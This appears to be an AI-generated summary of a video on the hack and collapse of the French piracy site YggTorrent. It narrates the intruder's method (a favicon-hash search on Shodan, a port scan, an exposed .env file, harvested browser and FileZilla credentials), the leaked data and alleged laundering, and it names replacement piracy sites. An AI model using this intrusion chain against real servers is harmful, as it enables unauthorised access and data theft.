Comment le plus gros site pirate de France est tombé
Audio Summary
AI Summary
YggTorrent, France's largest illegal downloading site, which had operated with impunity for nine years despite attempts by authorities to shut it down, recently fell victim to a hack. This event unveiled a sophisticated financial empire hidden behind the site's facade as a community of enthusiasts, reportedly generating up to 10 million euros in annual profits laundered through a complex system akin to a cartel. This summary will detail how the hacker found a vulnerability, what he discovered, and the implications for the French illegal downloading scene.
The story begins with the site's genesis. Illegal downloading sites frequently emerge, get shut down by authorities, or are abandoned by their administrators, often with the funds. It's an industry where the demise of one site often leads to the birth of several others. YggTorrent, following in the footsteps of a previous major site, T411, became the leading French-speaking reference site for downloading films, software, and video games. It even ranked among the top 35 most visited sites in France.
However, on March 3rd, the site disappeared, not due to authorities, but to a single individual named Groloum, assisted by two friends. Groloum hacked the site and published almost all its content, including user databases, not just the downloadable files. Unlike open sites like The Pirate Bay, YggTorrent required user registration, fostering a community that allowed for greater control over content and helped deter law enforcement infiltration.
Months before the hack, YggTorrent introduced a "turbo mode," a paid subscription offering unlimited downloads for €15 per month or a lifetime fee of €85. This was a significant change, as many users expected illegal downloading to be free. While free options remained, they were limited to five downloads per day with a 30-second wait between each. These changes, among others, began to agitate the community.
The site's operations relied on both administrators, who covered hosting costs and reaped substantial profits, and numerous volunteers. These volunteers included "teams" that uploaded pirated content and moderators who maintained order. These individuals were often unpaid or received site credits, leading to growing resentment as administrators implemented new rules from their "ivory tower."
A notable instance of this discontent involved the QTZ team, a major uploader responsible for 3,300 shared files. Their complaints led to them being banned by YggTorrent's administrators. This created a climate of online protest, with some speculating that the administrators might be planning an "exit scam"—shutting down the site and absconding with the accumulated funds from nine years of payments.
The entire unraveling of YggTorrent began with a favicon, the small logo displayed in the browser's address bar. Groloum took the favicon, determined its unique hash, and used Shodan—a search engine that maps domains and IP addresses—to find other instances of this hash. This led him to an unknown pre-production server, a hidden server that Shodan had nevertheless cataloged.
Upon discovering this server, Groloum performed an NMAP port scan, revealing 13 open ports and a lack of a firewall. He focused on port 443, which allowed him to list the entire directory, exposing the file system. Within this directory, he found a development project for YggTorrent's future official API and, critically, a `.env` file. This file contained an incredible discovery: root access without a password, along with private keys stored in plain text.
On another port, 9306, Groloum could read a database. Here, he found text files, including a configuration file for a Windows server that should have been deleted after setup. This file contained an administrator password for the pre-production server. He then realized that this server was also being used as a personal computer by an administrator, highlighting lax security practices.
Leveraging this access, Groloum performed simple yet effective actions. He accessed Chrome's password vault on the server, which was stored in plain text. There, he found credentials for FileZilla, an FTP client used by developers to manage and upload code to different servers. FileZilla stored the passwords for all configured servers, giving Groloum access to not just one, but all of YggTorrent's servers.
From a single favicon, Groloum gained access to four servers, seven databases, 6.6 million user accounts, 13 payment processors, and 15 crypto wallets, totaling 19 GB of data. He then published an archive of this data, weighing 11 GB after removing certain sensitive information. Groloum deliberately omitted user IP addresses, emails, and password hashes to avoid leaking the data of 6.6 million users, even sending a message to ARCOM (the French authority) apologizing for not including the IP addresses, implicitly confirming he possessed them.
The published archive contained various damning revelations:
- **Bank transaction logs:** Payments transited through a YggTorrent server before reaching the payment processor, an unusual and insecure practice.
- **Full source code:** Analysis of the code revealed peculiar behaviors, such as not offering pornographic content to users identified as North African.
- **User accounts:** Millions of accounts were exposed, including pseudonyms, ages, and download histories. Groloum later admitted that leaving the pseudonyms was a mistake, as it allowed for correlations.
- **Internal YggTorrent documents:** These included the organizational chart, identifying two main administrators, "Oracle" (located in Morocco) and "Destroy," both using pseudonyms.
- **Technical evidence of malpractice:** Groloum claimed that password hashes were stored using MD5, an obsolete and easily decipherable hashing algorithm, posing a significant security flaw. He also found a "security.php" file handling credit card connection logs before transmitting them to the payment processor.
- **Cryptocurrency wallet scanner:** A script disguised as an "image Carousel Manager" was found to execute in the browser of every visitor, scanning for the presence of cryptocurrency wallets like MetaMask. The purpose of this was unclear, but it allowed administrators to know if users possessed crypto wallets. The combination of user names, emails, IP addresses, download histories, and crypto wallet presence raised serious privacy concerns.
Groloum's revelations extended to the financial scale of the operation, estimating YggTorrent's profits at 10 million euros for 2024 and 2025 (5 million annually), with server costs estimated at €500,000. This suggested Oracle and Destroy were making substantial gains. He also detailed their money laundering system:
- **Proxy domains:** 36 proxy domains were used.
- **Fake e-commerce sites:** Payments were routed through dozens of fake e-commerce sites.
- **Payment processors:** Funds arrived on platforms like PayPal or Stripe, disguised as t-shirt purchases.
- **Crypto conversion:** Funds were converted into cryptocurrency via platforms like Paygate.
- **Crypto mixer:** A crypto mixer, Tornado Cash, was used to convert funds into Monero, a cryptocurrency known for its anonymity, to obscure traceability.
- **Anonymous wallets:** Finally, funds were withdrawn into anonymous wallets.
This sophisticated money laundering infrastructure contrasted sharply with the site's poor security practices. Groloum also uncovered that YggTorrent was actively engaging in DDoS attacks against its competitors, indicating a fierce struggle for market dominance.
In response, YggTorrent's team initially denied the allegations, claiming that bank cards were not stored (which was true) and promising a return in 12 days with a surprise. However, the next day, they posted a message declaring that "the entertainment landscape has changed," listing legitimate streaming services like Canal+, Netflix, and France TV, and announcing their decision to sell the domain name but not for illegal activities. This suggested that the hack had utterly crippled them, forcing an immediate closure. It was speculated that they either lacked proper backups or seized the opportunity to exit.
Weeks later, YggTorrent's administrators resurfaced, claiming to have identified Groloum. They published a blog post on "grosou.fun" stating that they had received a blackmail email on March 2nd (the day before the hack), demanding $100,000 to prevent the data leak. They also accused Groloum of making a fraudulent claim to Cloudflare, alleging that YggTorrent's server was a C2 (command and control) server hosting malware and even sending a self-coded ransomware to antivirus providers, then placing it on their server to justify the Cloudflare takedown request.
The administrators believed Groloum's motive stemmed from frustration. In December, he had allegedly tried to "bot" the site to circumvent its rules and download content more easily. YggTorrent intervened, fixing the vulnerabilities and impacting Groloum's project. This, they suggested, led him to seek a new way to access content, inadvertently discovering the site's massive vulnerabilities through the favicon method. Essentially, they claimed he just wanted to watch movies without YggTorrent's rules, but stumbled upon a gaping security flaw.
YggTorrent's admins also claimed to unmask Groloum as "Uu dev" on GitHub, a 23-year-old French reverse engineering student. Evidence supporting this included a GitHub project named "Ciao YggTorrent" containing the pre-production server's address and a key, uploaded just before the leak.
Groloum, in an interview with a "warez" site, denied the blackmail email, calling it a fabrication. Regarding the C2 server claim, he cryptically stated, "It is possible that I am not entirely innocent." As for his identity, he responded, "The young woman you accuse of being Groloum is delighted by the attention you are giving her," implying he was pleased with the publicity.
The site's closure is now confirmed, with new platforms emerging to fill the void. Groloum himself, in his initial leak, suggested several alternatives like Lacal, Thor 9, and Gemini, all centralized platforms similar to YggTorrent. He initially withheld C411 due to suspicions about its connection to YggTorrent's administrators but later clarified it was safe. A new decentralized model, like "Collectify," has also emerged, aiming to avoid central control and address issues of moderation and authority